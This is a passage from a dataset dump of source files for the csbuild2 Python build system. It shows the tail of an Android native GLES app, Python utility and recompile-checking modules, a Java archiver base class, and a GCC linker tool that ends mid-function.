cmd)\n{\n (void)android_app;\n\n switch(cmd)\n {\n case APP_CMD_INIT_WINDOW:\n LOGI(\"APP_CMD_INIT_WINDOW\");\n gles_init(android_app);\n gles_paint();\n break;\n case APP_CMD_TERM_WINDOW:\n LOGI(\"APP_CMD_TERM_WINDOW\");\n gles_quit();\n break;\n case APP_CMD_WINDOW_REDRAW_NEEDED:\n LOGI(\"APP_CMD_WINDOW_REDRAW_NEEDED\");\n gles_paint();\n break;\n\n case APP_CMD_INPUT_CHANGED:\n LOGI(\"APP_CMD_INPUT_CHANGED\");\n break;\n case APP_CMD_WINDOW_RESIZED:\n LOGI(\"APP_CMD_WINDOW_RESIZED\");\n break;\n case APP_CMD_CONTENT_RECT_CHANGED:\n LOGI(\"APP_CMD_CONTENT_RECT_CHANGED\");\n break;\n case APP_CMD_GAINED_FOCUS:\n LOGI(\"APP_CMD_GAINED_FOCUS\");\n break;\n case APP_CMD_LOST_FOCUS:\n LOGI(\"APP_CMD_LOST_FOCUS\");\n break;\n case APP_CMD_CONFIG_CHANGED:\n LOGI(\"APP_CMD_CONFIG_CHANGED\");\n break;\n case APP_CMD_LOW_MEMORY:\n LOGI(\"APP_CMD_LOW_MEMORY\");\n break;\n case 
APP_CMD_START:\n LOGI(\"APP_CMD_START\");\n break;\n case APP_CMD_RESUME:\n LOGI(\"APP_CMD_RESUME\");\n break;\n case APP_CMD_SAVE_STATE:\n LOGI(\"APP_CMD_SAVE_STATE\");\n android_app->savedState = NULL;\n android_app->savedStateSize = 0;\n break;\n case APP_CMD_PAUSE:\n LOGI(\"APP_CMD_PAUSE\");\n break;\n case APP_CMD_STOP:\n LOGI(\"APP_CMD_STOP\");\n break;\n case APP_CMD_DESTROY:\n LOGI(\"APP_CMD_DESTROY\");\n break;\n default:\n break;\n }\n}\n\nstatic int32_t input_event_callback(struct android_app* android_app, AInputEvent* event)\n{\n (void)android_app;\n (void)event;\n\n switch(AInputEvent_getType(event))\n {\n case AINPUT_EVENT_TYPE_KEY:\n case AINPUT_EVENT_TYPE_MOTION:\n //return 1;\n default:\n break;\n }\n\n return 0;\n}\n\nvoid android_main(struct android_app* android_app)\n{\n (void)android_app;\n\n android_app->userData = NULL;\n android_app->onAppCmd = app_cmd_callback;\n android_app->onInputEvent = input_event_callback;\n\n while(!android_app->destroyRequested)\n {\n int events;\n struct android_poll_source *source;\n while(!android_app->destroyRequested &&\n ALooper_pollAll(-1, NULL, &events, (void**)&source) >= 0)\n {\n if(source)\n source->process(android_app, source);\n }\n }\n}\n\n}\n" }, { "alpha_fraction": 0.7278165221214294, "alphanum_fraction": 0.7382851243019104, "avg_line_length": 30.10077476501465, "blob_id": "25d42ea40e1f7569bb2007267b607cb7fcf485e8", "content_id": "8a335f75110d87dfd789bf73dc5d7fcc622c4be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4012, "license_type": "no_license", "max_line_length": 104, "num_lines": 129, "path": "/csbuild/_utils/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: _utils\n\t:synopsis: misc internal utility modules\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport math\nimport subprocess\nimport sys\n\nif sys.version_info[0] >= 3:\n\tBytesType = bytes\n\tStrType = str\n\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.decode(\"UTF-8\")\n\n\tdef PlatformUnicode(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type unicode in python2 and str in python3.\n\t\t:return: unicode representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn PlatformString(inputStr)\n\n\tdef PlatformBytes(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in python2 and bytes in python3.\n\t\t:return: bytes representation of inputStr\n\t\t:rtype: bytes\n\t\t\"\"\"\n\t\tif isinstance(inputStr, bytes):\n\t\t\treturn inputStr\n\t\treturn inputStr.encode(\"UTF-8\")\nelse:\n\tBytesType = str\n\tStrType = unicode # pylint: disable=undefined-variable\n\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.encode(\"UTF-8\")\n\n\tdef PlatformUnicode(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type unicode in python2 and str in python3.\n\t\t:return: unicode representation of inputStr\n\t\t:rtype: unicode\n\t\t\"\"\"\n\t\tif isinstance(inputStr, unicode): # pylint: disable=undefined-variable\n\t\t\treturn inputStr\n\t\treturn inputStr.decode(\"UTF-8\")\n\n\tdef PlatformBytes(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in python2 and bytes in python3.\n\t\t:return: bytes representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn PlatformString(inputStr)\n\ndef FormatTime(totaltime, withMillis=True):\n\t\"\"\"\n\tFormat a duration of time into minutes:seconds (i.e., 2:55)\n\t:param totaltime: duration of time\n\t:type totaltime: float\n\t:param withMillis: Include milliseconds in output\n\t:type withMillis: bool\n\t:return: formatted string\n\t:rtype: str\n\t\"\"\"\n\ttotalmin = math.floor(totaltime / 60)\n\ttotalsec = math.floor(totaltime % 60)\n\tif withMillis:\n\t\tmsec = math.floor((totaltime - math.floor(totaltime))*10000)\n\t\treturn \"{}:{:02}.{:04}\".format(int(totalmin), int(totalsec), int(msec))\n\treturn \"{}:{:02}\".format(int(totalmin), int(totalsec))\n\n\nclass MultiBreak(Exception):\n\t\"\"\"\n\tSimple exception type to quickly break out of deeply nested loops.\n\t\"\"\"\n\tpass\n\n\ndef GetCommandLineString():\n\t\"\"\"\n\tGet the command line arguments used to invoke csbuild.\n\n\t:return: Command line arguments as a string.\n\t:rtype: str\n\t\"\"\"\n\treturn subprocess.list2cmdline(sys.argv[1:])\n" }, { "alpha_fraction": 0.7741098999977112, "alphanum_fraction": 0.7752888202667236, "avg_line_length": 41.40999984741211, "blob_id": "38508b2fc5c8aeb9589f003d4a7ecd7f725b2990", "content_id": "73c33cee11a8f8ac4ddc49fbbf30ba033c356c40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4241, "license_type": "no_license", "max_line_length": 147, 
"num_lines": 100, "path": "/csbuild/_build/recompile.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: recompile\n\t:synopsis: Utility functions for checking recompilability of a file or files\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom . import project\nfrom .._utils import ordered_set, shared_globals, PlatformString\nfrom ..toolchain import CompileChecker\nfrom .._utils.decorators import TypeChecked\nfrom .. import perf_timer, log\n\ndef CheckCompilabilityForFile(buildProject, checker, inputFile, valueMemo, allDeps):\n\t\"\"\"\n\tCheck compatibility for a single file\n\n\t:param buildProject: Project being filtered\n\t:type buildProject: project.Project\n\t:param checker: Checker\n\t:type checker: CompileChecker\n\t:param inputFile: Input file to check\n\t:type inputFile: str\n\t:param valueMemo: memo to collect memoized values from\n\t:type valueMemo: dict\n\t:param allDeps: All processed dependencies for a given set of checked files used to avoid redundant processing when there are recursive includes.\n\t:type allDeps: set[str]\n\t:return: A value with a blocking Get() and not-blocking TryGet()\n\t:rtype: any\n\t\"\"\"\n\tif inputFile in valueMemo:\n\t\treturn valueMemo[inputFile]\n\n\twith perf_timer.PerfTimer(\"Non-memoized compilability check\"):\n\t\tvalues = [checker.GetRecompileValue(buildProject, inputFile)]\n\n\t\tdeps = {os.path.abspath(PlatformString(f)) for f in checker.GetDependencies(buildProject, inputFile)}\n\t\tdeps -= allDeps\n\t\tif not deps:\n\t\t\treturn values[0]\n\n\t\t# When using cached dependencies, some files may no longer exist. 
Such cases should be seen by the user as\n\t\t# an error during compilation, not an obscure Python exception because we're trying to check its timestamp.\n\t\tdeps = {f for f in deps if os.access(f, os.F_OK)}\n\n\t\tallDeps.update(deps)\n\t\tvalues.extend([CheckCompilabilityForFile(buildProject, checker, dep, valueMemo, allDeps) for dep in deps])\n\n\t\tvalue = checker.CondenseRecompileChecks(values)\n\t\tvalueMemo[inputFile] = value\n\t\treturn value\n\n@TypeChecked(buildProject=project.Project, checker=CompileChecker, inputFiles=ordered_set.OrderedSet)\ndef ShouldRecompile(buildProject, checker, inputFiles):\n\t\"\"\"\n\tDetermine whether or not a file or list of files should be recompiled.\n\n\t:param buildProject: Project being filtered\n\t:type buildProject: project.Project\n\t:param checker: Compile checker to check with\n\t:type checker: CompileChecker\n\t:param inputFiles: files to check\n\t:type inputFiles: ordered_set.OrderedSet[input_file.InputFile]\n\t:return: True if the list of inputs should be reprocessed, false otherwise\n\t:rtype: bool\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Filter for recompile\"):\n\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t# All files should be \"compiled\" when generating a solution.\n\t\t\treturn True\n\t\tlog.Info(\"Checking if we should compile {}\", inputFiles)\n\t\tbaseline = checker.GetRecompileBaseline(buildProject, inputFiles)\n\t\tif baseline is None:\n\t\t\treturn True\n\t\tvalues = [CheckCompilabilityForFile(buildProject, checker, os.path.abspath(PlatformString(f.filename)), checker.memo, set()) for f in inputFiles]\n\n\t\twith perf_timer.PerfTimer(\"Cross-thread Final Resolution\"):\n\t\t\treturn checker.ShouldRecompile(checker.CondenseRecompileChecks(values), baseline)\n" }, { "alpha_fraction": 0.6181347370147705, "alphanum_fraction": 0.6189982891082764, "avg_line_length": 32.08571243286133, "blob_id": "9f74e5d9bceef45b7d56e6992b8d45e9cee40400", "content_id": "83cf3217534c0f666e4f0cb9e4660dcfd7641987", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5790, "license_type": "no_license", "max_line_length": 124, "num_lines": 175, "path": "/csbuild/tools/java_archivers/java_archiver_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
module:: java_archiver_base\n\t:synopsis: Base class for Java archivers.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.java_tool_base import JavaToolBase\n\nfrom ... import commands, log\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass JavaArchiverBase(JavaToolBase):\n\t\"\"\"\n\tBase class for Java archivers.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputGroups = { \".class\" }\n\toutputFiles = { \".jar\" }\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._entryPointClass = projectSettings.get(\"javaEntryPointClass\", \"\")\n\n\t\tJavaToolBase.__init__(self, projectSettings)\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef SetJavaEntryPointClass(fullClassName):\n\t\t\"\"\"\n\t\tSet the entry point class for a Java application.\n\n\t\t:param fullClassName: Entry point class in the form: <package>.<class_name>\n\t\t:type fullClassName: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"javaEntryPointClass\", fullClassName)\n\n\n\t################################################################################\n\t### Public API\n\t################################################################################\n\n\tdef GetJavaEntryPointClass(self):\n\t\t\"\"\"\n\t\tGet the entry point class for the Java application.\n\n\t\t:return: Java application entry point class.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._entryPointClass\n\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project):\n\t\t\"\"\"\n\t\tGet the set of output files that will be created from archiving a project.\n\n\t\t:param project: Project being archived.\n\t\t:type project: project.Project\n\n\t\t:return: Tuple of files that will be produced from archiving.\n\t\t:rtype: tuple[str]\n\t\t\"\"\"\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\t\"\"\"\n\t\tGet the command to archive the provided set of files for the provided project.\n\n\t\t:param project: Project to archive.\n\t\t:type project: project.Project\n\n\t\t:param inputFiles: Files being archived.\n\t\t:type inputFiles: input_file.InputFile\n\n\t\t:param classRootPath: Root path for the compiled class files.\n\t\t:type classRootPath: str\n\n\t\t:return: Command to execute, broken into a list, as would be provided to subprocess functions.\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn 
[]\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\t\"\"\"\n\t\tExecute a group build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: Project being built.\n\t\t:type inputProject: csbuild._build.project.Project\n\n\t\t:param inputFiles: List of files to build.\n\t\t:type inputFiles: list[input_file.InputFile]\n\n\t\t:return: Tuple of files created by the tool - all files must have an extension in the outputFiles list.\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Linker(\n\t\t\t\"Archiving {} ({}-{}-{}).jar...\",\n\t\t\tinputProject.outputName,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\tclassRootPath = os.path.join(inputProject.intermediateDir, self._javaClassRootDirName)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFiles, classRootPath), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFiles)\n\n\t\treturn self._getOutputFiles(inputProject)\n" }, { "alpha_fraction": 0.6505626440048218, "alphanum_fraction": 0.6529879570007324, "avg_line_length": 29.407079696655273, "blob_id": "471d888a62df52cee2765967822312b5504a932b", "content_id": "7f1eeef79c9e5c7f4187544cd1ece0d336fa0999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10308, "license_type": "no_license", "max_line_length": 119, "num_lines": 339, "path": "/csbuild/tools/linkers/gcc_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: gcc_linker\n\t:synopsis: gcc linker tool for C++, d, asm, etc\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport platform\nimport re\n\nimport csbuild\n\nfrom .linker_base import LinkerBase\nfrom ... 
import commands, log\nfrom ..._utils import ordered_set, response_file, shared_globals\n\ndef _ignore(_):\n\tpass\n\nclass GccLinker(LinkerBase):\n\t\"\"\"\n\tGCC linker tool for c++, d, asm, etc\n\t\"\"\"\n\tsupportedArchitectures = {\"x86\", \"x64\", \"arm\", \"arm64\"}\n\n\tinputGroups = {\".o\"}\n\toutputFiles = {\"\", \".a\", \".so\"}\n\tcrossProjectDependencies = {\".a\", \".so\"}\n\n\t_failRegex = re.compile(R\"ld: cannot find -l(.*)\")\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project):\n\t\treturn tuple({ os.path.join(project.outputDir, project.outputName + self._getOutputExtension(project.projectType)) })\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tcmdExe = self._getArchiverName()\n\t\t\tcmd = [\"rcs\"] \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\t\t\tuseResponseFile = self._useResponseFileWithArchiver()\n\t\telse:\n\t\t\tcmdExe = self._getBinaryLinkerName()\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomArgs() \\\n\t\t\t\t+ self._getArchitectureArgs(project) \\\n\t\t\t\t+ self._getSystemArgs(project) \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryPathArgs(project) \\\n\t\t\t\t+ self._getRpathArgs(project) \\\n\t\t\t\t+ self._getStartGroupArgs() \\\n\t\t\t\t+ self._getLibraryArgs() \\\n\t\t\t\t+ self._getEndGroupArgs()\n\t\t\tuseResponseFile = self._useResponseFileWithLinker()\n\n\t\tif useResponseFile:\n\t\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\t\tif shared_globals.showCommands:\n\t\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\t\tcmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\t\telse:\n\t\t\tcmd = [cmdExe] + cmd\n\t\t\tcmd = [arg for arg in cmd if arg]\n\n\t\treturn cmd\n\n\tdef _findLibraries(self, project, libs):\n\t\tret = {}\n\n\t\tshortLibs = ordered_set.OrderedSet(libs)\n\t\tlongLibs = []\n\n\t\tfor lib in libs:\n\t\t\tif os.access(lib, os.F_OK) and not os.path.isdir(lib):\n\t\t\t\tabspath = os.path.abspath(lib)\n\t\t\t\tret[lib] = abspath\n\t\t\t\tshortLibs.remove(lib)\n\n\t\t\telif os.path.splitext(lib)[1]:\n\t\t\t\tshortLibs.remove(lib)\n\t\t\t\tlongLibs.append(lib)\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tnullOut = os.path.join(project.csbuildDir, \"null\")\n\t\telse:\n\t\t\tnullOut = \"/dev/null\"\n\n\t\tif shortLibs:\n\t\t\t# In most cases this should be finished in exactly two attempts.\n\t\t\t# However, in some rare cases, ld will get to a successful lib after hitting a failure and just give up.\n\t\t\t# -lpthread is one such case, and in that case we have to do this more than twice.\n\t\t\t# However, the vast majority of cases should require only two calls (and only one if everything is -lfoo format)\n\t\t\t# and the vast majority of the cases that require a third pass will not require a fourth... but, everything\n\t\t\t# is possible! 
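The retry loop below hinges on ld's two lookup syntaxes: -lfoo searches for libfoo.so or libfoo.a by stem, while -l:name matches a filename verbatim, which is why any library carrying an explicit extension migrates from shortLibs to longLibs. Sketched in isolation with hypothetical library names:

# Standalone sketch of the -l vs. -l: bucketing used in the loop below.
import os

libs = ["pthread", "libfoo.so.2"]                                   # hypothetical inputs
shortLibs = [lib for lib in libs if not os.path.splitext(lib)[1]]   # no extension -> -l
longLibs = [lib for lib in libs if os.path.splitext(lib)[1]]        # extension -> -l:
args = ["-l" + lib for lib in shortLibs] + ["-l:" + lib for lib in longLibs]
# args -> ["-lpthread", "-l:libfoo.so.2"]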
\t\t\twhile True:\n\t\t\t\tcmd = [self._getLdName(), \"--verbose\", \"-M\", \"-o\", nullOut] + \\\n\t\t\t\t\t [\"-L\"+path for path in self._getLibrarySearchDirectories()] + \\\n\t\t\t\t\t [\"-l\"+lib for lib in shortLibs] + \\\n\t\t\t\t\t [\"-l:\"+lib for lib in longLibs]\n\t\t\t\treturncode, out, err = commands.Run(cmd, None, None)\n\t\t\t\tif returncode != 0:\n\t\t\t\t\tlines = err.splitlines()\n\t\t\t\t\tmoved = False\n\t\t\t\t\tfor line in lines:\n\t\t\t\t\t\tmatch = GccLinker._failRegex.match(line)\n\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\tlib = match.group(1)\n\t\t\t\t\t\t\tif lib not in shortLibs:\n\t\t\t\t\t\t\t\tfor errorLine in lines:\n\t\t\t\t\t\t\t\t\tlog.Error(errorLine)\n\t\t\t\t\t\t\t\treturn None\n\t\t\t\t\t\t\tshortLibs.remove(lib)\n\t\t\t\t\t\t\tlongLibs.append(lib)\n\t\t\t\t\t\t\tmoved = True\n\n\t\t\t\t\tif not moved:\n\t\t\t\t\t\tfor line in lines:\n\t\t\t\t\t\t\tlog.Error(line)\n\t\t\t\t\t\treturn None\n\n\t\t\t\t\tcontinue\n\t\t\t\tbreak\n\n\t\t\tmatches = []\n\n\t\t\ttry:\n\t\t\t\t# All bfd linkers should have the link maps showing where libraries load from. Most linkers will be\n\t\t\t\t# bfd-based, so first assume that is the output we have and try to parse it.\n\t\t\t\tloading = False\n\t\t\t\tinGroup = False\n\t\t\t\tfor line in out.splitlines():\n\t\t\t\t\tif line.startswith(\"LOAD\"):\n\t\t\t\t\t\tif inGroup:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tloading = True\n\t\t\t\t\t\tmatches.append(line[5:])\n\t\t\t\t\telif line == \"START GROUP\":\n\t\t\t\t\t\tinGroup = True\n\t\t\t\t\telif line == \"END GROUP\":\n\t\t\t\t\t\tinGroup = False\n\t\t\t\t\telif loading:\n\t\t\t\t\t\tbreak\n\n\t\t\t\tassert len(matches) == len(shortLibs) + len(longLibs)\n\t\t\t\tassert len(matches) + len(ret) == len(libs)\n\n\t\t\texcept AssertionError:\n\t\t\t\t# Fall back to doing the traditional regex check when the link map check fails.\n\t\t\t\t# All bfd- and gold-compatible linkers should have this.\n\t\t\t\tsucceedRegex = re.compile(\"(?:.*ld(?:.exe)?): Attempt to open (.*) succeeded\")\n\t\t\t\tfor line in err.splitlines():\n\t\t\t\t\tmatch = succeedRegex.match(line)\n\t\t\t\t\tif match:\n\t\t\t\t\t\tmatches.append(match.group(1))\n\n\t\t\t\tassert len(matches) == len(shortLibs) + len(longLibs)\n\t\t\t\tassert len(matches) + len(ret) == len(libs)\n\n\t\t\tfor i, lib in enumerate(shortLibs):\n\t\t\t\tret[lib] = matches[i]\n\t\t\tfor i, lib in enumerate(longLibs):\n\t\t\t\tret[lib] = matches[i+len(shortLibs)]\n\t\t\tfor lib in libs:\n\t\t\t\tlog.Info(\"Found library '{}' at {}\", lib, ret[lib])\n\n\t\treturn ret\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \"\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".so\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getLdName(self):\n\t\treturn \"ld\"\n\n\tdef _getBinaryLinkerName(self):\n\t\treturn \"g++\"\n\n\tdef _getArchiverName(self):\n\t\treturn \"ar\"\n\n\tdef _useResponseFileWithLinker(self):\n\t\treturn True\n\n\tdef _useResponseFileWithArchiver(self):\n\t\treturn True\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = []\n\t\tif project.projectType == 
csbuild.ProjectType.SharedLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"-shared\",\n\t\t\t\t\"-fPIC\",\n\t\t\t])\n\t\treturn args\n\n\tdef _getCustomArgs(self):\n\t\treturn self._linkerFlags\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutFile = self._getOutputFiles(project)[0]\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn [outFile]\n\t\treturn [\"-o\", outFile]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n\n\tdef _getLibraryPathArgs(self, project):\n\t\t_ignore(project)\n\t\targs = [\"-L{}\".format(os.path.dirname(libFile)) for libFile in self._actualLibraryLocations.values()]\n\t\treturn args\n\n\tdef _rpathStartsWithVariable(self, rpath):\n\t\treturn rpath.startswith(\"$\")\n\n\tdef _getRpathOriginVariable(self):\n\t\treturn \"$ORIGIN\"\n\n\tdef _resolveRpath(self, outDir, rpath):\n\t\tif not rpath or rpath.startswith(\"/usr/lib\") or rpath.startswith(\"/usr/local/lib\"):\n\t\t\treturn None\n\n\t\trpath = os.path.normpath(rpath)\n\n\t\t# Do not change any rpath that begins with a variable.\n\t\tif not self._rpathStartsWithVariable(rpath):\n\t\t\tabsPath = os.path.abspath(rpath)\n\n\t\t\t# If the RPATH is in the output directory, we can ignore it.\n\t\t\tif absPath == outDir:\n\t\t\t\treturn None\n\n\t\t\trelPath = os.path.relpath(absPath, outDir)\n\n\t\t\t# We join the path with the origin variable if it can be formed relative to the output directory.\n\t\t\tif absPath != relPath:\n\t\t\t\torigin = self._getRpathOriginVariable()\n\t\t\t\trpath = os.path.join(origin, relPath)\n\n\t\treturn rpath\n\n\tdef _getRpathArgs(self, project):\n\t\tif project.projectType != csbuild.ProjectType.Application:\n\t\t\treturn []\n\n\t\targs = 